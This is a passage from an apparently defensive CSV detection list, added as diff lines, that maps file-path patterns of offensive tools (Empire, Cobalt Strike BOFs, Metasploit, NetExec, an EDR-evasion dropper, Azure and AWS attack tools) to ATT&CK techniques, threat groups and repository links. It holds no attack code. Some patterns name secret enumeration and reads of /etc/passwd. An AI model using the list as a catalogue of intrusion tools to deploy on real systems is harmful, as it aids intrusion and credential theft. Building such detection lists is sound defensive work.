T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire/client/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire:latest*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/EmpireProject*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation 
Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 
+"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_domain_info*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/EnumCLR.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/enumerate.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/enumerate/enumerate.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*/enumeration/azureAd.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/azureAzService.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure 
environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/subdomain.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/enumeration/userenum.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Erebus/*.dll*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/Erebus/*.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*/Erebus-email.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
